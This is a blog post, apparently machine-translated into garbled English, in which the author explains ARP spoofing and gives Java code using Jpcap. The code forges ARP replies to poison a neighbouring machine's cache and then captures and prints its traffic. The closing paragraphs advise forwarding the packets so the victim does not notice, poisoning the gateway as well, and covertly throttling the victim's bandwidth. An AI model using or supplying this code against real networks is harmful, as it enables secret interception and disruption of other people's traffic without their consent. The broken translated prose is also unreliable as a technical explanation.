If there's anything that's not right lately, that's the pain of sharing a network, especially when other people are using peer-to-peer tools to download software, and while you're looking at the Web's progress bar a little bit, that pain can be excruciating for my cyber-worm-level people. Absolutely can not endure, and then the Internet to download Peer-to-peer terminator, hum, you are unkind to me is not righteous, see who is bad. After the software is good, immediately start monitoring, and then try the next speed, wow, that's cool. Unfortunately, not long before the other side ran to ask me why they broke the net? I stared a moment, the garbage software even the other side of the net is broken, so a branch of the deal with him, said I see, finally reluctantly clearance, fortunately they do not understand the computer, or it will fall big (looks very despicable, do not BS I, I am also compelled).
No way, the poor software even people have broken the net, I just want to give them a speed limit (also a little conscience), carefully check the file below, the way to use is no problem ah, why this? Thought for a long time also have no clue, no way, it seems to only own hands, so the Internet to find some information on this aspect, also wrote a little code to do the experiment, because the time is limited also only wrote a little, but the overall approach is probably some understanding, here to write an article probably record their own practice, So that you can share it with the public as a diary.
In fact, the current network similar to Peer-to-peer Terminator software, mainly based on ARP spoofing implementation, the network is everywhere on the ARP spoofing introduction, but for this article readers do not need to go to find, I will probably explain here.
ARP (Address resolution Protocol) addresses the interpretation Protocol, the main purpose is for IP and MAC address interpretation. IP is the network layer protocol, and the MAC is used by the data link layer. Two nodes in the network to communicate, then the sender must know the source and destination of the MAC address, and the network layer is the use of IP address, so to obtain the MAC address, you must obtain the corresponding MAC address through the IP address, so you need to use the ARP protocol to convert IP address to MAC address, At the same time in order to be able to quickly find the destination of the MAC address, each node will have an ARP cache, for the preservation has been turned a good MAC address, you can use the Arp–a command under the console to view the ARP cache table.
and ARP specific process is when you need to get a remote MAC address via IP, the system will first check the ARP table for the existence of the corresponding IP address, if not, send an ARP broadcast, when a node with this MAC address received ARP request, will create an ARP Reply packet, and sent to the source node ARP request, ARP Reply package contains the destination node MAC address, after the source node to accept this reply, will be the destination node's MAC address in the ARP cache table, the next time to request the same IP address, The system will get the destination MAC address directly from the ARP table without having to send the ARP broadcast again.
See here, the specific process of ARP probably explained again, hope can explain clearly. Believe that the heart of a friend must have begun to consider the principle of ARP spoofing, it is the use of ARP table for ARP spoofing, such as a local area network machine A, through the Gateway B Internet connection, and its ARP table has a gateway B IP and MAC address pairs, as follows:
192.168.1.1-> MAC1 (too lazy to write so long, with MAC1 as the MAC address)
So that is, when a wants to surf the internet, all of his data will be sent to the gateway and then forwarded by the gateway, then the data of a will first find the MAC address of the gateway via 192.168.1.1 MAC1, and then the data can be sent to the gateway. At this point your machine is C,mac address is MAC2, you want to use ARP spoofing to get the data of a transmission, then what you need to do is actually very simple, Is the machine A's ARP table 192.168.1.1 corresponding MAC address MAC1 to MAC2 can be, this way machine a all sent to the 192.168.1.1 of the data will be sent to the MAC address MAC2 machine, that is, your machine.
The way to change the record of an APR table is to forge an ARP reply packages sent to machine A, and this ARP Reply packet in the source IP for the 192.168.1.1,mac address for MAC2 both your machine's MAC address, machine A will receive the source IP and Mac will be flushed to its ARP cache table, overwriting the original record, eventually this can achieve the purpose of ARP spoofing.
I do not know whether we have an understanding of ARP deception? If you don't know it, search the Internet, a lot of relevant information on the Internet. OK, the principle is finished, that is the turn to achieve, through Java how to achieve ARP spoofing it?
From beginning to end, of course, not my style, the Java community so large, I should make good use, to stand on the shoulders of giants success, hehe. There is an open source project, Jpcap, which provides a middle-tier interface that allows users to invoke such libraries as wincap/libpcap to control network transmissions, and to view their documents on the official website.
Here, I implemented a simple packet interception program, based on the principle of ARP spoofing,
the things we need to do are as follows:
1, the construction of an ARP reply package
2. Send the packet to a machine that requires deception
The code is as follows:
Copy Code code as follows:
public class Locallistener {
Private final static String gate_ip = "192.168.11.1";
Private final static byte[] Gate_mac = {0x00, 0x0a, (byte) 0xc5, 0x42, 0x6e, (byte) 0x9a};
Private Jpcapcaptor Jpcap; Connection to Device
Private Jpcapsender sender; Instance used for sending
Private Packet Replypacket; ARP Reply Package
private NetworkInterface device; Current Machine network card device
Private Ipmacmap Targetipmacmap; Destination IP mac Pair
Public Locallistener (Ipmacmap target) throws Exception {
networkinterface[] devices = Jpcapcaptor.getdevicelist (); device = devices[1];
This.targetipmacmap = target;
Initsender ();
Initpacket ();
}
private void Initsender () throws Exception {
Jpcap = Jpcapcaptor.opendevice (device, Watts, false, 10000); To open a connection to a device
Jpcap.setfilter ("IP", true); Only listen for IP packets
Sender = Jpcap.getjpcapsenderinstance ();
}
private void Initpacket () throws Exception {
Reply the source IP and MAC address of the package, this IP-MAC will be mapped to the ARP table
Ipmacmap TARGETSSD = new Ipmacmap (gate_ip, device.mac_address);
Create a package that modifies ARP for the target machine
Replypacket = Arppacketgern.genpacket (Targetipmacmap, TARGETSSD);
Create Ethernet header information and package into reply package
Replypacket.datalink = Ethernetpacketgern.genpacket (Targetipmacmap.getmac (),
device.mac_address);
}
public void Listen () throws interruptedexception{
Thread t = new Thread (new Runnable () {
public void Run () {
Send reply packet, modify the destination ARP table, ARP table will be updated over a period of time, so need to keep sending
while (true) {
Send ();
try {
Thread.Sleep (500);
catch (Interruptedexception ex) {
Logger.getlogger (LocalListener.class.getName ()). log (Level.severe, NULL, ex);
}
}
}
});
T.start ();
Intercepts the packet sending and receiving information of the current network device
while (true) {
Ippacket Ippacket = (ippacket) jpcap.getpacket ();
System.out.println (Ippacket);
}
}}
Ip-mac entity, used only to save a pair of Ip-mac addresses
public class Ipmacmap {
Private String IP;
Private byte[] mac;
Public Ipmacmap () {
}
Public ipmacmap (String IP, byte[] mac) {
This.ip = IP;
This.mac = Mac;
}
Public String GetIP () {
return IP;
}
public void setIp (String IP) {
This.ip = IP;
}
Public byte[] Getmac () {
return mac;
}
public void Setmac (byte[] mac) {
This.mac = Mac;
}
}
ARP Reply Package generation class for generating reply packages based on destination address and source address
public class arppacketgern{
public static Arppacket Genpacket (ipmacmap target, Ipmacmap sender) throws exception{
Arppacket arptarget = new Arppacket ();
Arptarget.hardtype = Arppacket.hardtype_ether; Select Ethernet Type (Ethernet)
Arptarget.prototype = arppacket.prototype_ip; Select IP network protocol type
Arptarget.operation = arppacket.arp_reply; Select reply Type
Arptarget.hlen = 6; MAC address length fixed 6 bytes
Arptarget.plen = 4; IP address length fixed 4 bytes
ARPTARGET.TARGET_HARDADDR = Target.getmac ();
ARPTARGET.TARGET_PROTOADDR = Inetaddress.getbyname (Target.getip ()). GetAddress ();
ARPTARGET.SENDER_HARDADDR = Sender.getmac ();
ARPTARGET.SENDER_PROTOADDR = Inetaddress.getbyname (Sender.getip ()). GetAddress ();
return arptarget;
}
}
Build Ethernet header information based on destination Mac and source MAC for data transfer
public class ethernetpacketgern{
public static Ethernetpacket Genpacket (byte[] Targetmac, byte[] Sendermac throws Exception {
Ethernetpacket ethtotarget = new Ethernetpacket (); Create an Ethernet header
Ethtotarget.frametype = Ethernetpacket.ethertype_arp; Select an Ethernet package type
Ethtotarget.dst_mac = Targetmac;
Ethtotarget.src_mac = Sendermac;
return ethtotarget;
}
}
As on the code to create an IP sent to the 192.168.11.4 of the ARP reply packet, which can be seen, reply packet source IP is 192.168.11.1, and the source Mac is changed to the current machine MAC address, both DEVICE.MAC_ Address so that when the 192.168.11.4 machine receives the reply package, the ARP table is refreshed, and all data sent to 192.168.11.1 is actually sent to the machine that is currently running the program. A thread is created in the program to loop through the reply packet, mainly because the ARP table will be updated within a certain period of time, so it is necessary to keep sending to ensure that its MAC address is changed all the time. While the main thread listens for and prints all IP packet information for the current device, this method can only listen to the information of the native packet, but because ARP spoofing is used, So you'll intercept the packets when 192.168.11.4 send the data to the 192.168.11.1, and you'll see a message like the following:
1216798614:885583/192.168.11.4->/61.135.189.33 Protocol (6) priority (0) hop (128) offset (0) ident (34922) TCP 1337 > 8016 seq (1062321893) win (65535) S
In fact, although the previous procedure can intercept and listen to 192.168.11.4 packets, but if the real operation of the 192.168.11.4 machine will not be able to access the Internet (assuming that the machine through the 192.168.11.1 as a gateway to the Internet), this is why?
This is because the computer intercepts the 192.168.11.4 packet, but it does not forward the packet, so the data packet is disconnected from your machine, and the packet cannot be sent. Since to monitor the other machine, of course, can not let the other party know, if you monitor the machine, but caused the other side can not access the Internet, fools also know that there are problems, so the above procedures still need to add a supplement, That is, the packet data in the forwarding to the 192.168.11.1, as long as the interception of the packet sent to send out on it, specific how to do it for everyone to think about it, sleepy, rest, if there is a friend interested and really can't think how to do, you can put forward to me, if necessary, next time to paste a complete point example.
Yes, finally there is a place to add, that is, we can use the same way to refresh the Arp gateway, so that the gateway to receive the data will be intercepted by the machine, the same again through the machine forward to the destination machine can be. So that the other side can be normal access to the Internet, and we can intercept each other's packets, if you want to speed limit, that is, in the interception of packets at the same time, to carry out a certain delay, such as a second only allow the number of K data through, can be rigged here, the same, specific how to leave everyone think it, ^ o ^.
